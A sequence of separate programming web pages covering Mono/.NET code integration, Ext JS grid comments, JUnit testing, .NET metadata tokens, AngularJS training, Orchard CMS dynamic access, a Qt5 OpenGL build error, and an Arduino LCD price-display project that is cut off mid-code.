Some of the .NET code that we are getting might not be complete; it might be missing resources, strings, and build files, and might not be trivially buildable. So it is important that when you submit a pull request, the patch builds completely.

Performance/Memory side effects

This is mostly a non-issue, but we might find cases where Mono class libraries have been fine-tuned for use in the Mono runtime, and bringing the equivalent code from Microsoft might regress our performance or make us allocate more memory. Some items to watch out for:

Code Access Security checks: these are likely present in .NET, and they do not exist in Mono. They are relatively expensive to perform, and Mono does not even implement them correctly. So we would need to ifdef out all the CAS-related support when importing the code.

Object Disposed: Mono did not always faithfully implement the object disposed pattern. This is a pattern where objects that implement IDisposable throw an ObjectDisposedException whenever a member of the instance is called after the object's Dispose method has been called. This requires extra testing that Mono currently does not have in a few places.
It might not matter, but we might want to watch out for this. Enumeration Validation: .NET tends to validate the values of enumerations passed to its functions. Mono does not do this, so we might have a performance impact when we bring some of the code. Code Access Security checks are probably the ones we should be most worried about, as they are completely useless in Mono.

Compile-Time Defines

The Microsoft source code contains many different kinds of compiler defines that are used for conditional compilation. Whenever we are importing code from Microsoft, we need to perform an audit and determine which features we want to take.

Strategy

In general, we will be integrating code from the Reference Source release, as this contains the API that is closest to Mono. We are tracking the task assignments on Trello. Later on, when we implement Mono Core, we will instead contribute the VM/OS-specific bits to .NET Core. We need to come up with an integration plan that will maximize the benefits to Mono and our users with the least amount of engineering effort. While in an ideal world we could bring some 80-90% of the code over, this is a major effort with many risks involved. We will prioritize the work to focus on what would give us the most benefits upfront for the Mono community, and leave the more complex, difficult bits for later.

Giving Mono a big boost from the start

When bringing code to Mono, we can bring code in the following ways:

- Entire assemblies
- Entire classes
- Blended Work
- Individual members

Entire Assemblies

We should port entire assemblies when our assembly is known to be very buggy, in bad shape, or just completely broken.
Immediate candidates for this include:

- WCF - almost immediately
- System.Web - almost immediately

Medium term candidates include:

- System.Configuration - possible, but requires careful examination
- System.Linq.Data
- Remoting

Long term candidates include:

- XML stack

Entire Classes

We would port entire classes when a class or a family of classes is known in Mono to be buggy, poorly maintained or a source of problems. Candidates for this include:

- System.Text.RegularExpressions

Blended Work

These are libraries of high-quality code whose Mono counterpart might be known to have limitations, bugs or problems, but where the Microsoft implementation contains dependencies on native libraries that do not exist across all platforms.

- HTTP client stack … this was done by Pull Request #4893 and similar PRs.
- System.Data.* - Microsoft's implementation has many dependencies on native code that need to be refactored to be cross platform.

Individual Members

We will find some of this code in a few places. There are places in Mono that, while pretty good overall, might have some known bugs and limitations. The binding functionality in System.Reflection is an example of a method that works, but might have bugs and mistakes on the edges.

Porting and Regressions

Whenever we bring .NET code to replace Mono code, there might be cases where we introduce a regression of some kind: in functionality, in performance, or by bringing in a behavior that is incompatible with the idioms that Mono users have used for a long time. In general, when porting code to Mono, we should make sure that Mono's test suite continues to pass, and that no regressions are introduced. If a regression is introduced, we need to file a bug and track this particular problem.

Very popular, mostly bug-free APIs: skip

Mono's core is in very good shape, and there will be very little value in bringing the .NET implementation to Mono.
It would consume valuable engineering time to replace good code with another piece of good code, while also paying the price of potential regressions.

Empowering Third Parties

There are certain pieces of code that are going to be difficult to do, but if we do them, we can assist third parties that do not know as much about Mono's internals or our build process to contribute.

Dealing with System.Configuration

In general, the idiom that we will use when porting code that involves System.Configuration, which we want to support both in the full profile mode and the Mobile Profile mode, will be roughly:

- Comment out the public class that subclasses ConfigurationSection.
- Keep the SettingsSectionInternal class around, since so much code depends on it.
- ifdef out the constructor that depends on System.Configuration from this class, and replace it instead with hardcoded values that we obtain from running the code in .NET and observing the default values.
- Add the partial class modifier to the SettingsSectionInternal class.
- Provide a constructor in the partial class in Mono to set up the default values.
- Track each setting, so that we can later decide if we want to provide a C# API to change these values.

Source Code Style

When making changes, try to keep the style of the original project. If you are making changes to .NET's code, use their style. When making changes to Mono, use our style. We believe that we can mostly make few changes to the upstream code, using #if blocks, partial classes, and splitting a few things to achieve portability.

.NET Core and Mono

We want to contribute some of the cross-platform code from Mono, as well as chunks that we port from the .NET Framework Reference Source, to the .NET Core effort. We will update this page with information as the porting process at Microsoft evolves and we can volunteer some of our/their code back to the .NET Core effort.
https://www.mono-project.com/docs/about-mono/dotnet-integration/
Published Apr 26, 2011 | The Sencha Dev Team | Guide | Medium | Last Updated Jul 11, 2011
This Guide is most relevant to Ext JS 4.x.
Guide guides/grid/README.js is not currently available

6 Comments

Olivier Pons (3 years ago):
That's a very nice tutorial, but is there any way to handle key (up / press / down) events? If the user presses the "del" key, suppress the current record; if the user presses the "enter" key, edit the current record; if the user presses the "insert" key, create a new record. How would you do this?

DK (3 years ago):
I used this code as an example ... my JSP includes ext-debug.js ... I keep getting "Uncaught TypeError: Cannot call method 'substring' of undefined" on line 5981 --> (if (namespace === from || namespace.substring(0, from.length) === from) {). What is it complaining about?

Bo (3 years ago):
Tooltip for grid - trying to utilize MVC to create a tooltip (e.g.); care to show an example of how that might look?

slemmon (3 years ago):
@Olivier - Check out this page: It's for older Ext versions, but has a KeyMap section that I think might help you out.

Craig P (3 years ago):
I tried to work this in to the existing MVC tutorial. As for the paging, either docked or in-line scrolling: it didn't work. Surprise surprise.

Tirumalasetti (3 years ago):
I'm new to Ext JS. Started working with Ext JS 4 a couple of days ago. Pagination doesn't work with the code below. I mean the store does not reflect pageSize=n (e.g. 1, 2, 3, ... etc.).

Ext.create('Ext.data.Store', {
    model: 'User',
    autoLoad: true,
    pageSize: 4,
    proxy: {
        type: 'ajax',
        url: 'data/users.json',
        reader: {
            type: 'json',
            root: 'users',
            totalProperty: 'total'
        }
    }
});

Ext.create('Ext.grid.Panel', {
    store: 'User',
    columns: ...,
    dockedItems: [{
        xtype: 'pagingtoolbar',
        store: userStore, // same store GridPanel is using
        dock: 'bottom',
        displayInfo: true
    }]
});

Wasted a couple of days to come to this conclusion. After googling I got a partial pagination solution with PaginationMemoryProxy.js.
Again, if I want to use the Ajax proxy this doesn't work out. Please fix this issue so that other folks are not affected.
http://www.sencha.com/learn/the-grid-component/?_escaped_fragment_=/guide/grid-section-paging
While software testing is generally performed by a professional software tester, unit testing is often performed by the software developers working on the project at that point in time. Unit testing ensures that a specific function is working perfectly. It also reduces software development risks, cost and time. Unit testing is performed by the software developer during the construction phase of the software development life cycle. The major benefit of unit testing is that it reduces construction errors during software development, thus improving the quality of the product. Unit testing is about testing classes and methods.

What is JUnit?

JUnit is a testing tool for the Java programming language. It is very helpful when you want to test each unit of the project during the software development process.

How to perform unit testing using the JUnit testing tool

To perform JUnit testing in Java, first of all, you have to install the Eclipse editor. Installation of the latest version is recommended. You can download the Eclipse IDE from the following link:. In the Eclipse editor, you can write any code. For example, let's suppose that I want to test the following code:

Code-1

1 package com;
2
3 public class Junit {
4
5     public String concatenate(String firstName, String lastName) {
6
7         return firstName + lastName;
8     }
9
10     public int multiply(int number1, int number2) {
11
12         return number1 * number2;
13     }
14
15 }

After writing Code-1, let's write two test cases: one for the concatenate method and the other for the multiply method of the Junit class defined in this code.
To create JUnit test cases, you need to click on the Eclipse editor: File->New->JUnit Test Case

Defining the test case for the concatenate() method of the Junit class (Code-1)

Code-2

1 package com;
2 import static org.junit.Assert.*;
3 import org.junit.Test;
4
5 public class ConcatTest {
6
7     @Test
8     public void testConcatnate() {
9
10         Junit test = new Junit();
11
12         String result = test.concatenate("Vikas", "Kumar");
13
14         assertEquals("VikasKumar", result);
15
16     }
17
18 }

Code-2 is the test case for the concatenate() method defined inside the Junit class in Code-1. The annotation @Test at Line 7 is supported by JUnit version 4. To add JUnit version 4, you can click on the project directory in the Eclipse IDE and go to Java Build Path, before clicking on Add Library and then on JUnit, where you select JUnit 4. The assertEquals() method is a predefined method, and it takes two parameters. The first parameter is the expected output and the second is the original output. If the expected output doesn't match the original output, then the test case fails. To run the test cases, right click the code in Eclipse and then click on Run as JUnit Test.

Defining the test case for the multiply() method of the Junit class (Code-1)

Code-3

1 package com;
2
3 import static org.junit.Assert.*;
4 import org.junit.Test;
5
6 public class MultiplyTest {
7
8     @Test
9     public void testMultiply() {
10
11         Junit test = new Junit();
12
13         int result = test.multiply(5, 5);
14
15         assertEquals(25, result);
16     }
17
18 }

Code-3 is the test case for the multiply() method of the Junit class defined above.

Creating a test suite

A test suite is a combination of multiple test cases. To create a JUnit test suite, you need to click on the following in Eclipse: File->Other->Java->JUnit->JUnit Test Suite

After creating the JUnit test suite, the code will look like what is shown in the Code-4 snippet.
Code-4

1 package com;
2
3 import org.junit.runner.RunWith;
4 import org.junit.runners.Suite;
5 import org.junit.runners.Suite.SuiteClasses;
6
7 @RunWith(Suite.class)
8 @SuiteClasses({ ConcatTest.class, MultiplyTest.class })
9 public class AllTests {
10
11 }

Understanding the @Before annotation

The @Before annotation is used to annotate the method that has to be executed before each actual test method gets executed. To understand this, let's look at Code-5.

Code-5

1 package com;
2
3 public class Calculator {
4
5     public int add(int x, int y) {
6
7         return x + y;
8     }
9
10     public int sub(int x, int y) {
11
12         return x - y;
13
14     }
15 }

Now let's create the test case for Code-5. The following code is the JUnit test case for the Calculator class defined in this code.

Code-6

1 package com;
2
3 import static org.junit.Assert.*;
4 import org.junit.Before;
5 import org.junit.Test;
6
7 public class CaculatorTest {
8
9     Calculator cal;
10
11     @Before
12     /*
13     the init() method will be called before each test,
14     i.e. before testAdd() as well as testSub()
15     */
16     public void init() {
17
18         cal = new Calculator();
19
20     }
21
22     @Test
23     public void testAdd() {
24
25         int x = 10;
26         int y = 20;
27         assertEquals(30, cal.add(x, y));
28
29     }
30
31     @Test
32     public void testSub() {
33         int x = 10;
34         int y = 20;
35         assertEquals(-10, cal.sub(x, y));
36     }
37
38 }

Parameterised unit test cases using JUnit

If you want to test a method with multiple input values, you would normally have to write multiple test cases for the same method. But if you use the parameterised unit testing technique, you don't need to write multiple test cases for the same method. Let's look at the example of the Calculator class defined in Code-5. If you have to create parameterised test cases for the add() method of the Calculator class with multiple inputs, then consider the following code for that requirement.
Code-7

1 package com.emertxe;
2
3 import static org.junit.Assert.*;
4 import java.util.Arrays;
5 import java.util.Collection;
6 import org.junit.Assert;
7 import org.junit.Before;
8 import org.junit.Test;
9 import org.junit.runner.RunWith;
10 import org.junit.runners.Parameterized;
11 import org.junit.runners.Parameterized.Parameters;
12
13 @RunWith(Parameterized.class)
14 public class AddParamTest {
15
16     private int expectedResult;
17     private int firstVal;
18     private int secondVal;
19     Calculator cal;
20
21     @Before
22     public void init() {
23
24         cal = new Calculator();
25     }
26
27     public AddParamTest(int expectedResult, int firstVal, int secondVal) {
28         this.expectedResult = expectedResult;
29         this.firstVal = firstVal;
30         this.secondVal = secondVal;
31     }
32
33     @Parameters
34     public static Collection<Object[]> testData() {
35
36         Object[][] data = new Object[][] { { 6, 2, 4 }, { 7, 4, 3 },
37             { 8, 2, 6 } };
38
39         return Arrays.asList(data);
40     }
41
42     @Test
43     public void testAdd() {
44         Assert.assertEquals(expectedResult, cal.add(firstVal, secondVal));
45     }
46 }

When the test case written in Code-7 is executed, execution occurs in the following order:

- The @RunWith(Parameterized.class) annotation at Line 13 is processed.
- The static @Parameters method at Line 34 is executed.
- An instance of the AddParamTest class (Line 14) is created for each data row.
- The data {6,2,4}, {7,4,3} and {8,2,6} at Lines 36-37 is passed to the constructor at Line 27.
- The testAdd() method at Line 43 is executed once per data row.
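The execution order above can be sketched in plain Java, without the JUnit runner. This is a hypothetical hand-rolled simulation of what the Parameterized runner does, not JUnit's actual implementation: for every data row, construct fresh fixtures (the @Before step) and run the test body.

```java
import java.util.Arrays;
import java.util.List;

// A hand-rolled sketch of what the Parameterized runner does:
// for every data row, set up a fresh fixture and run the test method.
public class ParamRunnerSketch {

    // Stand-in for the Calculator class from Code-5.
    static class Calculator {
        int add(int x, int y) { return x + y; }
    }

    public static void main(String[] args) {
        // Same data rows as Code-7: { expected, firstVal, secondVal }.
        List<int[]> rows = Arrays.asList(
                new int[] { 6, 2, 4 },
                new int[] { 7, 4, 3 },
                new int[] { 8, 2, 6 });

        for (int[] row : rows) {
            Calculator cal = new Calculator();    // what @Before / init() does
            int expected = row[0];
            int actual = cal.add(row[1], row[2]); // the body of testAdd()
            if (expected != actual) {             // what Assert.assertEquals does
                throw new AssertionError(
                        "expected " + expected + " but was " + actual);
            }
        }
        System.out.println("3 parameterised cases passed");
    }
}
```

All three rows satisfy expected == first + second, so the sketch runs to completion; change any row and it throws an AssertionError, which is how a parameterised test failure surfaces.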
http://opensourceforu.com/2015/08/unit-testing-in-java-using-the-junit-framework/
Many of the .NET docs use the phrase "TypeDef or TypeRef". What's the difference? Both refer to metadata tokens. Each token has a scope for resolving the token, which basically corresponds to a module (a .dll or .exe). IMetaDataImport is the interface for reading metadata from a module. A TypeDef refers to a type definition within a scope. A TypeRef refers to a TypeDef in another scope. So a TypeDef is the "real type definition", whereas a TypeRef just refers to a type you imported from another module. A TypeDef contains interesting things like the name, base class (specified as either a TypeDef or TypeRef token), flags, implemented interfaces, methods, fields, and other members. A TypeRef just contains the name and a token (an AssemblyRef or ModuleRef) referring to the other scope.

TypeRefs get resolved to TypeDefs by:

1) Finding the IMetaDataImport associated with the AssemblyRef. This is hard because the CLR loads modules dynamically at runtime. (A debugger can do this via ICorDebugModule2::ResolveAssembly.)
2) Looking up a TypeDef by name in that new scope.

An example:

Here's an example. We have a class hierarchy: Derived2 -> Derived1 -> Base -> System.Object. Derived1 + Derived2 are defined in one dll, Base in another, and System.Object in another (mscorlib.dll).

Base.cs:

public class Base
{
    public int m_baseField;
}

Derived.cs:

public class Derived2 : Derived1
{
    public int m_Two;
}

public class Derived1 : Base
{
    public int m_One;
}

Compile it like so:

csc /t:library base.cs /debug+
csc /t:library derived.cs /debug+ /r:base.dll

Simple case: Same module

Now, if you enable "show token values" in ILDasm and then crack open derived.dll and view the definition of the Derived2 class, you see:

.class /*02000003*/ public auto ansi beforefieldinit Derived2 extends Derived1/*02000002*/ { } // end of class Derived2

Recall that the top 2 digits of a token are the token type, which specifies which metadata table. Table 02 is TypeDefs, 01 is TypeRefs, and 23 is AssemblyRefs.
The bottom 6 digits are the row of the table. So Derived2 is token 02000003, which is TypeDef (02) row 000003, and it derives from token 02000002, which is the TypeDef for Derived1. Since both classes are defined in the same module, everything here is TypeDefs.

Harder case: different modules

If you view base.dll and look at the definition of the Base class, you see:

.class /*02000002*/ public auto ansi beforefieldinit Base extends [mscorlib/*23000001*/]System.Object/*01000001*/ { } // end of class Base

We see 'Base' gets token 02000002, which is table 02 (TypeDefs), row 000002. And it derives from token 01000001, which is TypeRef #1. ILDasm also shows us that TypeRef #1 has the following properties:
- a name, "System.Object"
- a Resolution Scope of 23000001, which is row #1 in the AssemblyRef table.

ILDasm conveniently looks this up within the module scope and provides the information in the class definition. You can see the assembly ref in the module's manifest:

.assembly extern /*23000001*/ mscorlib
{
    .publickeytoken = (B7 7A 5C 56 19 34 E0 89 ) // .z\V.4..
    .ver 2:0:0:0
}

When an app wants to load an assembly, the loader / Fusion / etc. can use this information to load the assembly.

Compile-time binding vs. runtime binding

Note that because of runtime binding, the base class for Derived1 is not resolved until Base.dll is actually loaded. So you could compile against one copy of Base.dll, but then swap in a different copy of Base.dll when it actually executes. This usually happens by accident, and could generate a TypeLoadException.

Other comments:

This Def vs. Ref thing is a common paradigm throughout the metadata. For example, there are AssemblyRefs, MethodDef + MethodRef, FieldDef and FieldRef, etc.

What about reflection?

There are multiple ways of describing types in .NET. Metadata is very explicit about scopes within a process. In contrast, Reflection tries to hide scopes and hide the distinction between TypeDef and TypeRef.
Since reflection can resolve across scopes (or throw a TypeResolve exception), it can always resolve TypeRefs and thus always present the TypeDef. See for more information about metadata.
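The token layout described above (the top byte selects the metadata table, the low three bytes select the row within it) boils down to a little bit arithmetic. The following is a minimal standalone illustration of that split; the class and method names are made up for this sketch and it is not tied to any real metadata API:

```java
public class MetadataToken {
    // Table ids from the text: 01 = TypeRef, 02 = TypeDef, 23 = AssemblyRef.
    static final int TYPE_REF = 0x01;
    static final int TYPE_DEF = 0x02;
    static final int ASSEMBLY_REF = 0x23;

    // The top byte of a 32-bit token is the table id ("token type").
    static int table(int token) {
        return token >>> 24;
    }

    // The low three bytes are the row number within that table.
    static int row(int token) {
        return token & 0x00FFFFFF;
    }

    public static void main(String[] args) {
        int derived2 = 0x02000003;  // TypeDef, row 3 (the Derived2 class)
        int objectRef = 0x01000001; // TypeRef, row 1 (System.Object)
        System.out.printf("0x%08X -> table 0x%02X, row %d%n",
                derived2, table(derived2), row(derived2));
        System.out.printf("0x%08X -> table 0x%02X, row %d%n",
                objectRef, table(objectRef), row(objectRef));
    }
}
```

Running this on the tokens from the ILDasm dumps above recovers exactly the table/row pairs discussed: 0x02000003 is TypeDef row 3, and 0x01000001 is TypeRef row 1.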
https://blogs.msdn.microsoft.com/jmstall/2007/03/23/typedef-vs-typeref/
UPDATE: The next public class will be the week of September 8th in Oslo, Norway. UPDATE 2: AngularJS: Get Started is now available to Pluralsight subscribers. This course is a small but focused subset of the full class. At the end of last year I put together and taught a 2 day workshop on AngularJS fundamentals at NDC London, which due to popular demand I’m offering as part of a larger class for ProgramUtvikling. Feel free to contact me if you would like an on-site workshop, although my bandwidth for custom training is scarce. From animations to testing and everything in between, this course covers the features of AngularJS with a focus on practical scenarios and real applications. We will see how to build custom services, directives, filters, and controllers while maintaining a separation of concerns with clean JavaScript code. Hands on labs will reinforce concepts. The outline of topics: Some of the material is based on blog posts here on OTC.
http://odetocode.com/blogs/scott/archive/2014/01/21/angularjs-training.aspx
I have code to create the content part for a content type, but how is a field created and set? E.g. I have an ImageField that I have added to a content part; I need to upload the image and set its properties when the feature is enabled. The image field will be with the belts.

string[] martialArts = { "Tae Kwon Do", "Escrima", "Combat Hapkido" };

foreach (var martialArt in martialArts) {
    var ma = _contentManager.Create("MartialArt", item => {
        item.Record.Title = martialArt;
        var map = item.As();
        map.Active = true;
    });
}

string[] belts = { "White", "Yellow", "Gold", "Orange", "Green", "Purple", "Blue", "Brown", "Black White", "Black" };

foreach (var belt in belts) {
    var beltCreate = _contentManager.Create("Belt", item => {
        item.Record.Name = belt;
    });
}

var picture = (ImageField)contentItem.As<ProfilePart>().Fields.First(f => f.Name == "Picture");

In the next version it will be easier: contentItem.ProfilePart.Picture

A suggestion regarding the ImageField as well: it would be nice to be able to pick from the media service. Thank you.

Is it possible to access parts easily, like "contentItem.ProfilePart.Picture", in 1.1?

From inside your cshtml views, yes. You can use Shape Tracing to explore the model, and when you click on a property it will show you the @ command to reach that property. But from elsewhere (i.e. normal C# code) you still need to use contentItem.As<ProfilePart>() etc.

Thank you for the information. I hope accessing it like that from code will be added soon.

I don't think that's true: if you treat a content item as dynamic, you're in business.

dynamic ci = myContentItem;

Hmm, I hadn't tried that - seems a bit strange to me to cast an object to dynamic just to access properties that you can get to anyway. Personally I don't see the problem with As<T>, it only takes a few extra characters (and actually, with the benefits of Intellisense, ultimately requires fewer keystrokes).
I can see where dynamics are preferable in views and with some of the shape related stuff ... but with model objects I just feel happier using strong typing, particularly when it comes to refactoring. dynamic is not a type, so that is not technically casting. As<T> is great but it won't help for fields... See the horrible code Sébastien posted, that you still need to use if you don't want to use dynamic. I really don't mind Fields.First(f => f.Name == "Picture") ... I wouldn't exactly call it 'horrible', it's a fairly straightforward Linq query ... it's not that much more cumbersome than just typing the property name, and it's pretty rare that I actually need to access a field from code. Mostly I'll be building a Part if I need anything more serious than just displaying the field shape as usual. In fact there's only been one single time so far that I've needed access to a field like that; compared to dozens of times using As<T> for parts ... so for me it's not enough of a benefit to outweigh entirely losing Intellisense on the Part accessor. Or maybe I've just got so used to Intellisense over the years that I find dynamics somewhat scary :) Just had some further thoughts on this because, well, dynamic really interests me and Orchard is the first time I've really seen it applied in any significant way. I'm not trying to complain about its usage; quite the opposite, in fact - it opens up some really interesting and powerful scenarios that would otherwise be extremely awkward... But "with great power comes great responsibility" and all that, and also I'm just trying to get my head around exactly what I prefer about the more longhand notation in certain cases. What's worrying me is that there are times when dynamic notation can kind of obfuscate what's really going on and potentially make some things more confusing. Before I go on, I'm going to quickly invent a new extension method for ContentPart. 
It's a one-liner called Field<T> and it will make Sébastien's longhand code look much nicer :)

    public static T Field<T>(this ContentPart part, string name)
    {
        return (T)(part.Fields.First(f => f.Name == name));
    }

So let's suppose for a minute that I'm tracking down a bug in some code written by someone else. I see a line like this:

    var thing = ContentItem.Something.Else.New;

Now; what exactly is going on there? Is "Something" a Part, or could it be an obscure property of ContentItem that I was previously unaware of? I really don't know, and I can't even find out by hovering over it, because dynamic won't give me any information. Then, if I assume it is a Part, what is "Else"? It could be a Record-backed property of that part (perhaps a join to another table) or it could be a field. I still don't know; the only way to find out is to run the thing and debug, and even then the readout the debugger gives me on dynamic objects is frequently very hard to understand!

Contrast the above with:

    var thing = ContentItem
        .As<Something>()
        .Field<NewField>("Else")
        .New;

Ok; so it doesn't look quite as pretty, but actually it doesn't look that ugly, especially with my extension method; and there is an immediate and obvious advantage here that I can see at little more than a glance exactly what's going on. I'm drilling into a Part called Something and then a Field called "Else" of type NewField, which has a property called New. I can even hover the mouse over New and see that it's a Boolean (perhaps in the first example I might even have suspected it was some kind of factory method; this code I'm debugging was clearly written by someone with a brazen disregard for conventions!)

I can see that there are situations where the dynamic syntax is really very quick and useful; and particularly in Views, where the model is dynamic anyway, I would of course favor the shorter version.
But where there's a possibility of keeping things strongly typed, which there still is a lot of the time you'd be writing this kind of code, I'd rather do so - even if it takes a few extra keystrokes and an extension method or two. But then, I am also just a big fan of the As<T> method, largely because it's pretty much exactly the same as a method I wrote myself months ago in a project I was building, and it's a nice elegant compromise between adding dynamic functionality whilst retaining strong typing. So I really just enjoy using it :)

Err, sure, whatever works for you... Look, somebody was saying that they wish the dynamic form that is available from views was also available from code. I merely provided a way to make it work. Now if you prefer the strongly-typed stuff, I can see nothing wrong with that. I was just answering the question.

Sorry, I can get carried away sometimes when a point interests me. It is a very cool feature. I guess I just wish there could be a "best of both worlds" where the dynamic objects could still have some form of Intellisense support (I know that's impossible - at least right now ...)

It's not impossible: if it can be done at runtime, it can be done in principle at design time. Look at how much IntelliSense can be provided in JavaScript...

That's why I said "at least right now..." ;) With all the advances C# has made, who knows what it'll be doing by, say, .NET 6 or 7?
http://orchard.codeplex.com/discussions/247620
Building Qt5 with OpenGL global namespace errors

I'm trying to build the latest Qt5 with OpenGL support from source. I've followed the instructions here: I've configured with

    configure -c++11 -developer-build -opensource -opengl desktop -nomake examples -nomake tests

and am running nmake from the VS2012 x86 Native Tools Command Prompt. I am getting errors related to OpenGL:

    qopenglfunctions.h(593) : error C2039: 'glClearDepth' : is not a member of '`global namespace''
    qopenglfunctions.h(593) : error C3861: 'glClearDepth' : identifier not found
    qopenglfunctions.h(715) : error C2039: 'glDepthRange' : is not a member of '`global namespace''
    qopenglfunctions.h(715) : error C3861: 'glDepthRange' : identifier not found

and also errors like

    kernel\qopenglcontext.cpp : error C2065: 'GL_PROXY_TEXTURE_2D' : undeclared identifier

GL_TEXTURE_WIDTH and glGetTexLevelParameteriv are also undeclared identifiers, similar to GL_PROXY_TEXTURE_2D. Unfortunately I have searched this problem, but could not find a solution. The Qt build is successful when I am not passing -opengl desktop to configure. Here is my graphics card and OpenGL version info:

    GLEW version 1.9.0
    Reporting capabilities of pixelformat 1
    Running on a GeForce GT 540M/PCIe/SSE2 from NVIDIA Corporation
    OpenGL version 4.2.0 is supported

If anyone can provide any pointers I would be grateful.

Hi. Hmm, weird - it should build fine with -opengl desktop. Which branch are you building from? Those functions should be found inside of src/gui/opengl/qopenglext.h, which gets included from qopengl.h, which in turn should be included from qopenglfunctions.h.

Having the same trouble with the released version of 5.1.1, using Visual Studio 2012 x64. Any luck?
https://forum.qt.io/topic/24548/building-qt5-with-opengl-global-namespace-errors
Introduction: Fake Dynamic Price Tag

Needed Material

Here's what we used to build this project:

- An Arduino Uno R3
- A standard 16x2 LCD display. We used this one from Adafruit, but as long as it's compatible with the LiquidCrystal library, you should be good.

You'll need a few things to wire it up to the Arduino:

- some jumper cables
- a 220 ohm resistor
- a 10k ohm potentiometer (This is for controlling the contrast of the display. If you find a contrast you like, you can replace the potentiometer with a fixed resistor.)

First, let's get the display going!

Step 1: Wire Up the Display

There sure are a lot of pins on the back of that LCD. Luckily, the documentation for the software library we're going to use has a good guide to wiring it up. Check it out. In summary, your wiring should end up like this:

- Power:
  - LCD GND (pin 1) → Arduino GND
  - LCD VDD (pin 2) → Arduino +5V
  - LCD RW (pin 5) → Arduino GND
- LCD RS (pin 4) → Arduino digital pin 12
- LCD Enable (pin 6) → Arduino digital pin 11
- LCD D4 (pin 11) → digital pin 5
- LCD D5 (pin 12) → digital pin 4
- LCD D6 (pin 13) → digital pin 3
- LCD D7 (pin 14) → digital pin 2
- Wire a 10k potentiometer's legs to Arduino's +5V and GND
- Potentiometer's output → LCD VO (pin 3)
- LCD BL1 (pin 15) → 220 ohm resistor → Arduino +5V
- LCD BL2 (pin 16) → Arduino GND

When that's all set, load up one of the example LiquidCrystal projects in the Arduino IDE and see if it works! Remember to double-check the LCD initialization code in the samples – the pin numbers need to be correct or you won't see anything. For example, the "Blink" example has this code, which is correct given the above setup:

    const int rs = 12, en = 11, d4 = 5, d5 = 4, d6 = 3, d7 = 2;
    LiquidCrystal lcd(rs, en, d4, d5, d6, d7);

Tips

- Save yourself some soldering and invest in some crimp ends and header connectors.
On projects like this, where we're going to cram the electronics into a small case, being able to make short jumper cables is incredibly helpful.

- Similarly, heatshrink tubing is really useful to make sure nothing shorts out when it's all pressed up against itself.
- Since there are so many things going to GND and +5V, we opted to make a franken-cable (see the photo above) to be as compact as possible. If space were less of an issue, a breadboard or protoshield would have been an easier option.
- Some potentiometers are weirdly shaped. Generally, the left lead is used as ground, the rightmost lead as power, and the middle one as output. If yours has two leads on the front and one on the back, the one on the back is the output.

Gotchas

- If you don't see anything on your LCD, try turning the potentiometer all the way in one direction, then the other. At its lowest contrast, the LCD's content is completely invisible.
- If you see really weird gibberish on the LCD, or only one line instead of two, make sure all your connections are secure. We had a faulty connection to ground and it was causing the weirdest display issues.
- The LCD initialization code (what gets run by lcd.init() in the setup() function) is important and takes a while. If something is wrong with your display and you suspect a faulty wire, don't expect jiggling things to suddenly make it work. You may need to reset the Arduino so the initialization code has a chance to run properly.
- Make sure your wires are pretty short, but not too short. Nothing's worse than having to resolder because you're a few centimeters away from a header.

Great! Now let's make it show some fancy things.

Step 2: Code: Basics

First things first: let's have the display show "Current Price:" on the top line, and a random price in some range on the second. Every so often, let's have the price refresh. This is pretty simple, but will highlight the basic use of the LiquidCrystal library and some of its quirks.
First, let's pull in the library and define some constants:

    #include <LiquidCrystal.h>

    const uint8_t lcdWidth = 16;
    const uint8_t lcdHeight = 2;

    const long minPriceInCents = 50;
    const long maxPriceInCents = 1999;

    const unsigned long minMillisBetweenPriceUpdates = 0.25 * 1000;
    const unsigned long maxMillisBetweenPriceUpdates = 2 * 1000;

Great! Those are the parameters for the price range and how often it will refresh. Now let's make an instance of the LCD class provided by the library and initialize it. We'll print something out over the serial console, just to have some reassurance that things are working, even if we don't see anything on the LCD. We'll do that in the setup() function, which runs once after the Arduino boots. Note, though, that we declare the lcd variable outside of setup(), because we want access to it throughout the program.

    LiquidCrystal lcd(12, 11, 5, 4, 3, 2);

    void setup()
    {
        Serial.begin(9600);

        lcd.begin(lcdWidth, lcdHeight);
        Serial.println("LCD initialized");

        lcd.print("Current Price:");
    }

And for the meat, we'll use the built-in random() function and the String() initializer to construct a decimal price. random() only generates integers, so we'll divide its result by 100.0 to get a floating-point value. We'll do this in loop(), so it happens as often as possible, but with a random delay between the constants we defined earlier.

    void loop()
    {
        double price = random(minPriceInCents, maxPriceInCents) / 100.0;
        String prettyPrice = "$" + String(price, 2);

        lcd.setCursor(0, 1);
        lcd.print(prettyPrice);

        delay(random(minMillisBetweenPriceUpdates, maxMillisBetweenPriceUpdates));
    }

One thing to note is the call to lcd.setCursor(). The LiquidCrystal library doesn't automatically advance your text to the next line after a print, so we need to manually move the (invisible) cursor to the second line (here 1 – it's zero-based).
Also note that we didn't have to print "Current Price:" again; the LCD is not cleared unless you do so manually, so we only have to update the dynamic text.

Give it a run and you'll quickly see a related problem. If the price was, say, "$14.99" and then "$7.22", the display will show "$7.229". Remember, the display doesn't clear itself unless you tell it to. Even if you print on the same line, any text past what you print will remain. To fix this problem, we have to pad our string with spaces to overwrite any potential garbage. The easiest way to do this is to just tack a few spaces onto our prettyPrice variable:

    String prettyPrice = "$" + String(price, 2) + " ";

With that change in place, we've got a proof of concept! Let's gussy it up a bit.

Step 3: Code: Custom Characters

One of the coolest features of the LCD module we're using is the ability to create up to 8 custom characters. This is done through the createChar() method. This method takes an array of 8x5 bits that describe which pixels of the LCD to turn on for the given character. There are a few tools online to help generate these arrays. I used this one. If you're not feeling particularly designerly, I recommend using the Threshold filter in Photoshop to turn an image into black-and-white, and converting that to characters. Remember that you have a maximum of 8 custom characters, or 64x5 pixels. I opted for using 6 of those characters for the Amazon arrow logo, and the remaining 2 for a nicer trademark symbol. You can follow the CustomCharacter example in the Arduino IDE for how to use the API.
This is how I decided to group things:

    // Define the data for the Trademark characters
    const size_t trademarkCharCount = 2;
    const uint8_t trademarkChars[trademarkCharCount][8] = {
        { B00111,
          B00010,
          B00010,
          B00000,
          B00000,
          B00000,
          B00000,
          B00000 },
        { B10100,
          B11100,
          B10100,
          B00000,
          B00000,
          B00000,
          B00000,
          B00000 }
    };
    uint8_t firstTrademarkCharByte; // The byte used to print this character; assigned in initCustomChars()

Then I used a function like this, called from setup(), to create the characters:

    void initCustomChars()
    {
        firstTrademarkCharByte = 0;
        for (size_t i = 0; i < trademarkCharCount; i++)
        {
            lcd.createChar(logoCharCount + i, (uint8_t *)trademarkChars[i]);
        }
    }

